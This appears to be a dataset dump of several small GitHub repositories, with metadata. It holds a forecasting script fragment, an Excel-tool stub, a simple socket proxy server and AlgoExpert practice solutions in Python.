make_windows(vacc_full, window_size=WINDOW_SIZE, horizon=HORIZON)\n train_windows, test_windows, train_labels, test_labels = make_train_test_splits(full_windows, full_labels)\n\n # List for new preds\n future_forecast = []\n last_window = vacc_full[-WINDOW_SIZE:] # get the last window of the training data\n into_future = 20 # how far to predict into the future\n\n for i in range(into_future):\n # Make a pred for the last window, then append the prediction, append it again, append it again\n pred = new_model.predict(tf.expand_dims(last_window, axis=0))\n print(f\"Predicting on: \\n {last_window} -> Prediction: {tf.squeeze(pred).numpy()}\\n\")\n future_forecast.append(tf.squeeze(pred).numpy())\n # Update last window with new pred and get WINDOW_SIZE most recent preds (model was trained on WINDOW_SIZE windows)\n last_window = np.append(last_window, pred)[-WINDOW_SIZE:]\n \n return future_forecast\n\nif __name__ == '__main__':\n one_future = predict_one()\n full_future = predict_full()\n next_time_steps = create_next_timestep()\n\n print(one_future, full_future, next_time_steps)\n" } ]
4
AkashChauhanSoftEngi/Python-Automated-Systems
https://github.com/AkashChauhanSoftEngi/Python-Automated-Systems
5b651b29470f5d7b78e17c5dc47faefff6170466
b86aacebc74f41cf353cde6684cf4cf262646778
376c1be93663cf77fd38faa98146d89b39aa0236
refs/heads/master
2021-01-23T00:14:57.249174
2017-04-17T08:59:12
2017-04-17T08:59:12
85,707,996
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7579461932182312, "alphanum_fraction": 0.7677261829376221, "avg_line_length": 20.72222137451172, "blob_id": "59f8d4d41f0e59239f9505111616a2d6dda0b8a7", "content_id": "96b26946635ee9880e6924adbf3a50af2f461061", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 55, "num_lines": 18, "path": "/Script/PY.py", "repo_name": "AkashChauhanSoftEngi/Python-Automated-Systems", "src_encoding": "UTF-8", "text": "#from win32 import win32api\r\nfrom tkinter import *\r\n#import tkinter.filedialog\r\nfrom tkinter import filedialog\r\nimport os\r\nimport xlrd, xlwt\r\nimport pandas as pd\r\nimport xlutils.filter\r\nfrom xlutils.copy import copy as xl_copy\r\nimport tkinter as tk\r\nimport openpyxl\r\nimport re\r\nimport string\r\n\r\nroot = tk.Tk()\r\nroot.withdraw()\r\nfile_path = filedialog.askopenfilename(title='xxxxxxx')\r\n#Rest content deleted!\r\n" }, { "alpha_fraction": 0.7607879638671875, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 40, "blob_id": "4c46017c2e12f50d51e4f49cd0ec97935223ed16", "content_id": "955d3184e4a81cbcb5ac23094c3acaa9388e639d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1066, "license_type": "no_license", "max_line_length": 299, "num_lines": 26, "path": "/README.md", "repo_name": "AkashChauhanSoftEngi/Python-Automated-Systems", "src_encoding": "UTF-8", "text": "# Python-Automated-Systems\nIt is a Complex-Data-Manipulations & Management system\n\nThis is an Automated python project which helps Companies for Data Manipulations & Management. Complex manipulations on Excel's data has become so easy with this automated system.\n\nThis system automatically read the find that needs to be manipulated and store it to a desired place. This process contain complax logics to execute on excel file so it usually takes 6 minutes on 1,048,576 records excel file. This software runs in background so other work can be done along with it.\n\nThis Automated software helped employees to perform more tasks in given time. Company has saved 4 hours each day of around 20 employees by using one of these software's.\n\nThis project uses:\n* Python 3.5.2 & 2.7.12\n* Eclipse & Sublime [IDE & Text editor]\n\nLibraris like:\n* py2exe\n* openpyxl\n* pandas\n* pywin32\n* NumPy\n* pillow\n* regex\n* MySQL\n* python\n* pip\n\n<tt>I have shared only few details here but not the actual code, the code includes private information of the company I have created for!<tt>.\n" } ]
2
jvaleo/pure-python-proxy
https://github.com/jvaleo/pure-python-proxy
f066383bc5523c0ab28b4bf6c5aa4f8e8fb752c8
535c44e0bacbb838d638a69deb0767267aaf17f0
182f4f51664aff63d49831c6e330d791558cd91b
refs/heads/master
2021-01-22T09:32:06.673095
2014-08-07T00:21:08
2014-08-07T00:21:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5524030327796936, "alphanum_fraction": 0.5775911808013916, "avg_line_length": 30.117116928100586, "blob_id": "7ce86f79dc7c9f7aaa132b7d09128c63b5f01d2b", "content_id": "9424bce82f08f3406efce6e22f951d9f46369258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3454, "license_type": "no_license", "max_line_length": 98, "num_lines": 111, "path": "/proxy-server.py", "repo_name": "jvaleo/pure-python-proxy", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nSimple proxy server\n\"\"\"\n\nimport logging\nimport re\nimport socket\nimport sys\nimport threading\n\nHOST = '0.0.0.0'\nPORT = 8181\n\nLOG = logging.getLogger(__name__)\nLOG_HANDLER = logging.StreamHandler(sys.stdout)\nFORMAT = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\nLOG_HANDLER.setFormatter(FORMAT)\nLOG.addHandler(LOG_HANDLER)\nLOG.setLevel(logging.DEBUG)\n\ndef multithreading_server(client, addr):\n \"\"\"\n Threading handle\n \"\"\"\n data = client.recv(1024)\n lock = threading.Lock()\n while 1:\n lock.acquire()\n lock.release()\n LOG.debug('Client closed: {0}'.format(addr))\n lock.close()\n\n\ndef get_headers(data):\n \"\"\"\n Get the headers, if it is a GET then pass to check proxy server and pass the request\n \"\"\"\n headers = {}\n accepted_methods = [ 'POST', 'GET']\n lines = data.splitlines()\n for i in lines:\n if 'GET' in i or 'POST' in i: # Only support GET or POST\n request_path = i.split()[1]\n if re.match(r\"\\/service_1\\/.*\", request_path):\n request = request_path.split('/')[2]\n proxy_path = '10.0.0.10:8000'\n elif re.match(r\"\\/service_2\\/.*\", request_path):\n request = request_path.split('/')[2]\n proxy_path = '10.0.0.20:8001'\n elif re.match(r\"\\/service_3\\/.*\", request_path):\n request = request_path.split('/')[2]\n proxy_path = '10.0.0.30:8002'\n elif re.match(r\"\\/service_4\\/.*\", request_path):\n request = request_path.split('/')[2]\n proxy_path = '10.0.0.30:8003'\n return request, proxy_path\n break\n request, proxy_path = None\n return request, proxy_path\n\ndef web_server():\n \"\"\"\n Listen for requests on PORT\n \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n try:\n sock.bind((HOST, PORT))\n except Exception as e:\n LOG.error('Unable to bind to {0}:{1}'.format(HOST,PORT))\n sys.exit()\n sock.listen(5)\n while True:\n conn, addr = sock.accept()\n LOG.debug('Client {0}'.format(addr))\n data = conn.recv(1024)\n try:\n request, proxy_path = get_headers(data)\n except Exception as e:\n LOG.error('Unable to parse request/proxy_path')\n threading.Thread(target = multithreading_server, args = (conn, addr)).start()\n proxy_connection(proxy_path, request)\n\ndef proxy_connection(host, data):\n \"\"\"\n Take in a host:port and data and send it to the destination\n \"\"\"\n dest_ip = host.split(':')[0]\n dest_port = int(host.split(':')[1])\n forward = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n forward.settimeout(1)\n try:\n forward.connect((dest_ip, dest_port))\n LOG.debug('{0} {1}'.format(dest_ip, dest_port))\n except Exception as e:\n LOG.error('Unable to connect to {0} on {1} - {2}'.format(dest_ip, dest_port, e))\n try:\n forward.send(data)\n LOG.debug('{0} {1} {2}'.format(dest_ip, dest_port, data))\n forward.close()\n except Exception as e:\n LOG.error('Unable to send data {0} on {1} - {2} {3}'.format(dest_ip, dest_port, data, e))\n\nif __name__ == '__main__':\n try:\n while True:\n web_server()\n except KeyboardInterrupt:\n LOG.info('Caught KeyboardInterrupt')\n sys.exit()\n" } ]
1
RaulCoronado/Ejemplo-de-clases
https://github.com/RaulCoronado/Ejemplo-de-clases
a14b376716770aef8d9d6398d9aabcdd0c5fce09
3c957436afac7cb0ad630a0400be2d3f5f17a381
d999ed5924300beaa5259174aa3b92bb19b2cd78
refs/heads/master
2020-04-18T02:45:53.192534
2016-08-31T23:29:58
2016-08-31T23:29:58
67,080,924
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5669050216674805, "alphanum_fraction": 0.6353421807289124, "avg_line_length": 23.076923370361328, "blob_id": "50d1d50c9fd8037585c0c8800391c7fc3271e481", "content_id": "8341223e5879bbd46059d606b13472d610d3f513", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 979, "license_type": "no_license", "max_line_length": 94, "num_lines": 39, "path": "/Clases.py", "repo_name": "RaulCoronado/Ejemplo-de-clases", "src_encoding": "UTF-8", "text": "Python 3.5.2 (v3.5.2:4def2a2901a5, Jun 25 2016, 22:18:55) [MSC v.1900 64 bit (AMD64)] on win32\r\nType \"copyright\", \"credits\" or \"license()\" for more information.\r\n\r\n>>> class Pan:\r\n\tdef __init__(self, tam,sabor,precio):\r\n\t\tself.tam=tam\r\n\t\tself.sabor=sabor\r\n\t\tself.precio=precio\r\n\tdef desplegarC(self):\r\n\t\tprint (self.tam),\r\n\t\tprint (self.sabor),\r\n\t\tprint (self.precio)\r\n\t\t\r\n>>> pan1 = Pan(Grande,queso,50)\r\nTraceback (most recent call last):\r\n File \"<pyshell#17>\", line 1, in <module>\r\n pan1 = Pan(Grande,queso,50)\r\nNameError: name 'Grande' is not defined\r\n>>> pan1 = Pan(\"Grande\",\"Queso\",\"25\")\r\n>>> pan2 = Pan(\"Pequeno\",\"Chocolate\",\"10\")\r\n>>> pan3 = Pan(\"Grande\",\"Dulce\",\"500\")\r\n>>> pan1.desplegarC()\r\nGrande\r\nQueso\r\n25\r\n>>> pan2.desplegarC()\r\nPequeno\r\nChocolate\r\n10\r\n>>> pan3.desplegarC()\r\nGrande\r\nDulce\r\n500\r\n>>> raw_imput()\r\nTraceback (most recent call last):\r\n File \"<pyshell#24>\", line 1, in <module>\r\n raw_imput()\r\nNameError: name 'raw_imput' is not defined\r\n>>> \r\n" }, { "alpha_fraction": 0.7894737124443054, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 19, "blob_id": "b31221959d60e3b980bb14e5c1f8d01809d2bc30", "content_id": "03b61bf3a4910d613bb7d52d26940678ff53c1cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 19, "license_type": "no_license", "max_line_length": 19, "num_lines": 1, "path": "/README.md", "repo_name": "RaulCoronado/Ejemplo-de-clases", "src_encoding": "UTF-8", "text": "# Ejemplo-de-clases" } ]
2
henryoliver/algo-expert-solutions
https://github.com/henryoliver/algo-expert-solutions
35ac4df09b83d5fef31c1695fc8404a274312ca9
c45623861d97862fa62e2461a56d3946adde7e22
2e26cd20d96764bfe4e3dd29ece1a96cc2461bb8
refs/heads/master
2022-08-28T15:18:55.903334
2020-05-26T12:27:34
2020-05-26T12:27:34
266,343,724
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5013267993927002, "alphanum_fraction": 0.547866940498352, "avg_line_length": 35.014705657958984, "blob_id": "7816eb7e2aaf802a4b42998a24689e33f8304416", "content_id": "d3c7f5f63b14f41e3aa18fd7fbd0ec25b9237844", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4911, "license_type": "permissive", "max_line_length": 187, "num_lines": 136, "path": "/Arrays/three-number-sum.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# def threeNumberSum(array=[], targetSum=0):\n# '''\n# Solution 1 - Naive approach\n#\n# O(n^3) time | O(1) space\n#\n# The function should find all triplets in the array that sum up\n# to the target sum and return a two-dimensional array of all these triplets.\n#\n# array: a list of integers\n# targetSum: an integer\n# return: a two-dimensional list of all found triplets\n# '''\n# # Remove duplicates and sort the list\n# array = sorted(list(dict.fromkeys(array)))\n#\n# foundTriplets = [];\n#\n# for i in range(len(array) - 2):\n# firstNumber = array[i]\n#\n# for j in range(i + 1, len(array) - 1):\n# secondNumber = array[j]\n#\n# for k in range(j + 1, len(array)):\n# thirdNumber = array[k]\n#\n# if (firstNumber + secondNumber + thirdNumber == targetSum):\n# foundTriplets.append([firstNumber, secondNumber, thirdNumber])\n#\n# return foundTriplets\n#\n\n# def threeNumberSum(array=[], targetSum=0):\n# '''\n# Solution 2 - Hash map\n#\n# O(n^2) time | O(n) space\n#\n# If any two numbers in the input array sum up to the target sum,\n# the funciton should return them in an array.\n#\n# array: a list of integers\n# targetSum: an integer\n# return: a list of two integers\n# '''\n# # Remove duplicates and sort the list\n# array = sorted(list(dict.fromkeys(array)))\n#\n# foundTriplets = []\n#\n# for i in range(len(array) - 1):\n# trackedNumbers = {}\n# firstNumber = array[i]\n#\n# for j in range(i + 1, len(array)):\n# secondNumber = array[j]\n# potentialDiff = targetSum - (firstNumber + secondNumber)\n#\n# if (potentialDiff in trackedNumbers):\n# foundTriplets.append(sorted([potentialDiff, firstNumber, secondNumber]))\n# else:\n# trackedNumbers[secondNumber] = True\n#\n# foundTriplets.sort()\n#\n# return foundTriplets\n#\n\ndef threeNumberSum(array=[], targetSum=0):\n '''\n Solution 3\n\n O(n^2) time | O(n) space\n\n The function should find all triplets in the array that sum up\n to the target sum and return a two-dimensional array of all these triplets.\n\n array: a list of integers\n targetSum: an integer\n return: a two-dimensional list of all found triplets\n '''\n # Remove duplicates and sort the list\n array = sorted(list(dict.fromkeys(array)))\n\n foundTriplets = []\n\n for i in range(len(array) - 2):\n leftPointer = i + 1\n rightPointer = len(array) - 1\n\n while (leftPointer < rightPointer):\n currentSum = array[i] + array[leftPointer] + array[rightPointer]\n\n if (currentSum == targetSum):\n foundTriplets.append(sorted([array[i], array[leftPointer], array[rightPointer]]))\n leftPointer += 1\n rightPointer -= 1\n elif (currentSum < targetSum):\n leftPointer += 1\n elif (currentSum > targetSum):\n rightPointer -= 1\n\n foundTriplets.sort()\n\n return foundTriplets\n\n\n# Test cases (black box - unit testing)\ntestCases = [\n { 'assert': threeNumberSum([1, 2, 3], 7), 'expected': [] },\n { 'assert': threeNumberSum([1, 2, 3], 6), 'expected': [[1, 2, 3]] },\n { 'assert': threeNumberSum([8, 10, -2, 49, 14], 57), 'expected': [[-2, 10, 49]] },\n { 'assert': threeNumberSum([12, 3, 1, 2, -6, 5, -8, 6], 0), 'expected': [[-8, 2, 6], [-8, 3, 5], [-6, 1, 5]] },\n { 'assert': threeNumberSum([12, 3, 1, 2, -6, 5, 0, -8, -1], 0), 'expected': [[-8, 3, 5], [-6, 1, 5], [-1, 0, 1]] },\n { 'assert': threeNumberSum([1, 2, 3, 4, 5, 6, 7, 8, 9, 15], 18), 'expected': [[1, 2, 15], [1, 8, 9], [2, 7, 9], [3, 6, 9], [3, 7, 8], [4, 5, 9], [4, 6, 8], [5, 6, 7]] },\n\n # Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { 'assert': threeNumberSum(), 'expected': [] },\n { 'assert': threeNumberSum([], 0), 'expected': [] },\n { 'assert': threeNumberSum([1], 10), 'expected': [] },\n { 'assert': threeNumberSum([1, 2, 3, 4]), 'expected': [] },\n { 'assert': threeNumberSum([], 1000000000), 'expected': [] },\n { 'assert': threeNumberSum([1, 1, 1, 1, 2, 2, 2], 0), 'expected': [] },\n\n # Extremes\n { 'assert': threeNumberSum([12, 3, 1, 2, -6, 5, 0, -8, -1, 6, -5], 0), 'expected': [[-8, 2, 6], [-8, 3, 5], [-6, 0, 6], [-6, 1, 5], [-5, -1, 6], [-5, 0, 5], [-5, 2, 3], [-1, 0, 1]] },\n { 'assert': threeNumberSum([1, 2, 3, 4, 5, 6, 7, 8, 9, 15], 18), 'expected': [[1, 2, 15], [1, 8, 9], [2, 7, 9], [3, 6, 9], [3, 7, 8], [4, 5, 9], [4, 6, 8], [5, 6, 7]]}\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'Expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n" }, { "alpha_fraction": 0.5907368659973145, "alphanum_fraction": 0.6138947606086731, "avg_line_length": 23.73958396911621, "blob_id": "1f4bfe290132587a1a7c942dd70ed5f4a4215ab6", "content_id": "b8a07541ea5d6e213e68edc66859cbb98204c6a5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2387, "license_type": "permissive", "max_line_length": 115, "num_lines": 96, "path": "/Binary Search Trees/bst-construction.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "def twoNumberSum(array=[], targetSum=0):\n '''\n Solution 1\n\n O(n^2) time | O(1) space\n\n If any two numbers in the input array sum up to the target sum,\n the funciton should return them in an array.\n\n array: a list of integers\n targetSum: an integer\n return: a list of two integers\n '''\n\n arrayLength = len(array)\n\n for i in range(arrayLength - 1):\n firstNumber = array[i]\n\n for j in range(i + 1, arrayLength):\n secondNumber = array[j]\n\n if (firstNumber + secondNumber == targetSum):\n return [firstNumber, secondNumber]\n\n return []\n\n\ndef twoNumberSum(array=[], targetSum=0):\n '''\n Solution 2\n\n O(n) time | O(n) space\n\n If any two numbers in the input array sum up to the target sum,\n the funciton should return them in an array.\n\n array: a list of integers\n targetSum: an integer\n return: a list of two integers\n '''\n trackedNumbers = {}\n\n for currentNumber in array:\n potentialPair = targetSum - currentNumber\n\n if (potentialPair in trackedNumbers):\n return [potentialPair, currentNumber]\n else:\n trackedNumbers[currentNumber] = True\n\n return []\n\n\ndef twoNumberSum(array=[], targetSum=0):\n '''\n Solution 3\n\n O(n log(n)) time | O(1) space\n\n If any two numbers in the input array sum up to the target sum,\n the funciton should return them in an array.\n\n array: a list of integers\n targetSum: an integer\n return: a list of two integers\n '''\n array.sort()\n\n leftIndex = 0\n rigthIndex = len(array) - 1\n\n while (leftIndex < rigthIndex):\n currentSum = array[leftIndex] + array[rigthIndex]\n\n if (currentSum == targetSum):\n return [array[leftIndex], array[rigthIndex]]\n elif (currentSum < targetSum):\n leftIndex += 1\n elif (currentSum > targetSum):\n rigthIndex -= 1\n\n return []\n\n\n# Test cases (black box - unit testing)\n'Test Case #2'\nsorted(twoNumberSum([3, 5, -4, 8, 11, 1, -1, 6], 10)) == [-1, 11] and '🤘 Test PASSED' or '👎 Test FAILED'\n\n# Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n'Boundary conditions'\n'Test Case #2'\nsorted(twoNumberSum([-21, 301, 12, 4, 65, 56, 210, 356, 9, -47], 164)) == [] and '🤘 Test PASSED' or '👎 Test FAILED'\n\n# Extremes\n# console.info('Extremes');\n" }, { "alpha_fraction": 0.5598363280296326, "alphanum_fraction": 0.5963177680969238, "avg_line_length": 32.318180084228516, "blob_id": "a94b4667df66301ae74d38059d3191ab966c29ae", "content_id": "0345114b0c00db71470723b2efb19e2a05a3b247", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2945, "license_type": "permissive", "max_line_length": 110, "num_lines": 88, "path": "/Arrays/smallest-difference.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# Smallest Difference\n\n# def smallestDifference(arrayOne=[], arrayTwo=[]):\n# '''\n# Solution 1 - Brute force (aka: Naive approach)\n#\n# O(n^2) time | O(1) space\n#\n# arrayOne: a list of integers\n# arrayTwo: a list of integers\n# return: a list of two integers\n# '''\n# closestPair = []\n# closestNumber = float('inf')\n#\n# for firstNumber in arrayOne:\n# for secondNumber in arrayTwo:\n# absoluteDiff = abs(firstNumber - secondNumber)\n#\n# if (absoluteDiff < closestNumber):\n# closestNumber = absoluteDiff\n# closestPair = [firstNumber, secondNumber]\n#\n# return closestPair\n\ndef smallestDifference(arrayOne=[], arrayTwo=[]):\n '''\n Solution 2 - Sorting along with the two-pointer sliding window approach\n\n O(n log(n) + m log(m)) time | O(1) space\n\n arrayOne: a list of integers\n arrayTwo: a list of integers\n return: a list of two integers\n '''\n arrayOne.sort()\n arrayTwo.sort()\n\n closestPair = []\n closestNumber = float('inf')\n\n arrayOnePointer = 0;\n arrayTwoPointer = 0;\n\n while (arrayOnePointer < len(arrayOne) and arrayTwoPointer < len(arrayTwo)):\n firstNumber = arrayOne[arrayOnePointer]\n secondNumber = arrayTwo[arrayTwoPointer]\n currentAbsDiff = abs(firstNumber - secondNumber)\n\n if (firstNumber == secondNumber):\n closestPair = [firstNumber, secondNumber]\n break\n\n if (currentAbsDiff < closestNumber):\n closestNumber = currentAbsDiff\n closestPair = [firstNumber, secondNumber]\n\n if (firstNumber < secondNumber):\n arrayOnePointer += 1\n elif (secondNumber < firstNumber):\n arrayTwoPointer += 1\n\n return closestPair\n\n\n# Test cases (black box - unit testing)\ntestCases = [\n { 'assert': smallestDifference([-1, 5, 10, 20, 28, 3], [26, 134, 135, 15, 17]), 'expected': [28, 26] },\n { 'assert': smallestDifference([-1, 5, 10, 20, 3], [26, 134, 135, 15, 17]), 'expected': [20, 17] },\n { 'assert': smallestDifference([10, 0, 20, 25], [1005, 1006, 1014, 1032, 1031]), 'expected': [25, 1005] },\n \n # Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { 'assert': smallestDifference(), 'expected': [] },\n { 'assert': smallestDifference([]), 'expected': [] },\n { 'assert': smallestDifference([], []), 'expected': [] },\n { 'assert': smallestDifference([1], [1]), 'expected': [1, 1] },\n { 'assert': smallestDifference([1, 2, 3, 4]), 'expected': [] },\n { 'assert': smallestDifference([-1, -1, -1], [-1, -1, -1]), 'expected': [-1, -1] },\n\n # Extremes\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'Expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n" }, { "alpha_fraction": 0.5903835892677307, "alphanum_fraction": 0.5940620303153992, "avg_line_length": 29.43199920654297, "blob_id": "e4d5d5f1b022e9708cd5e08d1d90f6549015874f", "content_id": "17c67f275f2dca25c805a0dccae6926cbc269ec8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3818, "license_type": "permissive", "max_line_length": 95, "num_lines": 125, "path": "/Strings/palindrome-check.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# def isPalindrome(string=''):\n# '''\n# Solution 1 - Reverse array last first\n#\n# Complexity Analysis\n# O(n) time | O(n) space\n#\n# Check if non-empty string is a palindrome\n#\n# string: non-empty string\n# return: boolean\n# '''\n# # Gracefully handle type and Falsy values\n# if (not isinstance(string, str) or string == ''):\n# print('Argument should be a valid non-empty string')\n# return False\n#\n# if (len(string) == 1):\n# return True\n#\n# reversedChars = []\n#\n# for i in reversed(range(len(string))):\n# reversedChars.append(string[i])\n#\n# return string.lower() == ''.join(reversedChars).lower()\n\n# def isPalindrome(string='', i=0):\n# '''\n# Solution 2 - Recursion\n#\n# Complexity Analysis\n# O(n) time | O(n) space\n#\n# Check if non-empty string is a palindrome\n#\n# string: non-empty string\n# return: boolean\n# '''\n# # Gracefully handle type and Falsy values\n# if (not isinstance(string, str) or string == ''):\n# print('Argument should be a valid non-empty string')\n# return False\n#\n# j = len(string) - 1\n#\n# firstChar = string[i]\n# lastChar = string[j - i]\n#\n# # Base case\n# if (i >= j):\n# return True\n#\n# if (firstChar.lower() == lastChar.lower()):\n# return isPalindrome(string, i + 1)\n# else:\n# return False\n#\n\ndef isPalindrome(string=''):\n '''\n Solution 3 - Pointers\n\n Complexity Analysis\n O(n) time | O(1) space\n\n Check if non-empty string is a palindrome\n\n string: non-empty string\n return: boolean\n '''\n # Gracefully handle type and Falsy values\n if (not isinstance(string, str) or string == ''):\n print('Argument should be a valid non-empty string')\n return False\n\n if (len(string) == 1):\n return True\n\n for i in range(len(string)):\n leftPointer = string[i]\n rightPointer = string[len(string) - 1 - i]\n\n if (leftPointer.lower() != rightPointer.lower()):\n return False\n\n return True\n\n\n# Test cases (black box - unit testing)\ntestCases = [\n # Normal\n # Data that is typical ('expected') and should be accepted by the system.\n { 'assert': isPalindrome('Wow'), 'expected': True },\n { 'assert': isPalindrome('Anna'), 'expected': True },\n { 'assert': isPalindrome('Kayak'), 'expected': True },\n { 'assert': isPalindrome('1abcba1'), 'expected': True },\n { 'assert': isPalindrome('AbCdcBa'), 'expected': True },\n { 'assert': isPalindrome('Repaper'), 'expected': True },\n { 'assert': isPalindrome('abcdefg'), 'expected': False },\n { 'assert': isPalindrome('Hello World'), 'expected': False },\n\n # Boundary data (extreme data, edge case)\n # Data at the upper or lower limits of expectations that should be accepted by the system.\n { 'assert': isPalindrome('a'), 'expected': True },\n { 'assert': isPalindrome('tattarrattat'), 'expected': True },\n\n # Abnormal data (erroneous data)\n # Data that falls outside of what is acceptable and should be rejected by the system.\n { 'assert': isPalindrome(), 'expected': False },\n { 'assert': isPalindrome(0), 'expected': False },\n { 'assert': isPalindrome(''), 'expected': False },\n { 'assert': isPalindrome([]), 'expected': False },\n { 'assert': isPalindrome(()), 'expected': False },\n { 'assert': isPalindrome({}), 'expected': False },\n { 'assert': isPalindrome(None), 'expected': False },\n { 'assert': isPalindrome(False), 'expected': False }\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n\n" }, { "alpha_fraction": 0.5403546690940857, "alphanum_fraction": 0.5635179281234741, "avg_line_length": 28.073684692382812, "blob_id": "ddacc87b6d6f537536b62325af77725edf5ea882", "content_id": "b590123889730dbc5da2da7259724bcb0e179406", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2775, "license_type": "permissive", "max_line_length": 102, "num_lines": 95, "path": "/Arrays/move-element-to-end.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# Move Element To End\n\n# def moveElementToEnd(array=[], toMove=0):\n# '''\n# Solution 1 - Queue tracking system\n#\n# O(n) time | O(n) space\n#\n# array: a list of integers\n# toMove: an integer\n# return: a list in place\n# '''\n# # Queue - FIFO\n# class Queue:\n# def __init__(self):\n# self.queue = []\n#\n# def enqueue(self, item):\n# self.queue.append(item)\n#\n# def dequeue(self):\n# return self.queue.pop(0)\n#\n# def isEmpty(self):\n# return len(self.queue) == 0\n#\n# toMoveIndexesQueue = Queue()\n#\n# for currentIndex in range(len(array)):\n# currentNumber = array[currentIndex]\n#\n# if (currentNumber == toMove):\n# toMoveIndexesQueue.enqueue(currentIndex)\n# elif (toMoveIndexesQueue.isEmpty() == False):\n# firstToMoveIndex = toMoveIndexesQueue.dequeue();\n#\n# array[currentIndex] = array[firstToMoveIndex]\n# array[firstToMoveIndex] = currentNumber\n#\n# toMoveIndexesQueue.enqueue(currentIndex)\n#\n# return array\n\ndef moveElementToEnd(array=[], toMove=0):\n '''\n Solution 2 - Pointers narrowing approach\n\n O(n) time | O(1) space\n\n array: a list of integers\n toMove: an integer\n return: a list in place\n '''\n leftPointer = 0\n rightPointer = len(array) - 1\n\n while (leftPointer < rightPointer):\n leftNumber = array[leftPointer]\n rightNumber = array[rightPointer]\n\n if (leftNumber == toMove and rightNumber != toMove):\n array[leftPointer] = rightNumber\n array[rightPointer] = leftNumber\n\n leftPointer += 1\n rightPointer -= 1\n elif (rightNumber == toMove):\n rightPointer -= 1\n elif (leftNumber != toMove):\n leftPointer += 1\n\n return array\n\n\n\n# Test cases (black box - unit testing)\ntestCases = [\n { 'assert': moveElementToEnd([2, 1, 2, 2, 2, 3, 4, 2], 2), 'expected': [1, 3, 4, 2, 2, 2, 2, 2] },\n { 'assert': moveElementToEnd([1, 2, 4, 5, 6], 3), 'expected': [1, 2, 4, 5, 6] },\n { 'assert': moveElementToEnd([3, 3, 3, 3, 3], 3), 'expected': [3, 3, 3, 3, 3] },\n { 'assert': moveElementToEnd([1, 2, 4, 5, 3], 3), 'expected': [1, 2, 4, 5, 3] },\n \n # Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { 'assert': moveElementToEnd(), 'expected': [] },\n { 'assert': moveElementToEnd([]), 'expected': [] },\n\n # Extremes\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'Expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n" }, { "alpha_fraction": 0.5776196718215942, "alphanum_fraction": 0.5963777303695679, "avg_line_length": 23.15625, "blob_id": "50f863d3b01cb6e09de5ec552d06b615181b4e89", "content_id": "d345eb130483e184783b8c4b8bae566077025c29", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1546, "license_type": "permissive", "max_line_length": 55, "num_lines": 64, "path": "/Stacks/min-max-stack-construction.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "class MinMaxStack:\n def __init__(self):\n self.stack = []\n self.minMaxStack = []\n\n # O(1) time | O(1) space\n def peek(self):\n if (len(self.stack)):\n return self.stack[-1]\n\n return None\n\n # O(1) time | O(1) space\n def pop(self):\n if (len(self.stack)):\n self.minMaxStack.pop()\n return self.stack.pop()\n\n return None\n\n # Procidure \n # O(1) time | O(1) space\n def push(self, number):\n minNumber = number\n maxNumber = number\n\n if (len(self.minMaxStack)):\n lastMinMax = self.minMaxStack[-1]\n minNumber = min(lastMinMax[0], minNumber)\n maxNumber = max(lastMinMax[1], maxNumber)\n\n self.stack.append(number)\n 